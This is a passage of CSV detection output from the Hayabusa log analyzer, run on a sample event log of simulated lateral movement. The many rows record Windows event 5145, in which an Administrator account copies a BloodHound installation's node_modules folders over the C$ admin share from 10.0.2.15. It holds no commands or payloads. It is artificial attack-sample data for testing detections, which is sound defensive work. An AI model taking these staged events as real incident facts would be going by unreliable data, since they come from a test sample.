10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.438 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\reflect : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.438 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\regexp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.438 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\set : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.448 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\string : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.448 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\symbol : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.448 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\system : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: 
Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\typed : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\weak-map : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\weak-set : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.468 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\core : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.468 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\es5 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.468 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\es6 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.478 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\es7 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.478 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\fn : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.478 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.518 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\stage : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.518 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\web : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.518 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\modules\library : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\stage : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\web : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-util-is : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.568 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : 
Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-util-is\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.568 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\crc-32 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.568 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\crc-32\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.578 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\crc-32\types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.578 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.578 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\data : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\order : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\position : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\rank : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\node_modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\node_modules\lodash : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: 
Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\class : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\events : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\query : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\style : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\transition : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\util : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dot-prop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\duplexer2 : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\electron-store : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\env-paths : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\eventemitter2 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\eventemitter2\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\exenv : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\exit-on-epipe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\file-type : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\find-up : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share 
Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fontfaceobserver : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fontfaceobserver\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\frac : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fs.realpath : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fstream : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fstream\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fstream\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.658 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\glob : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.658 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graceful-fs : IP Address: 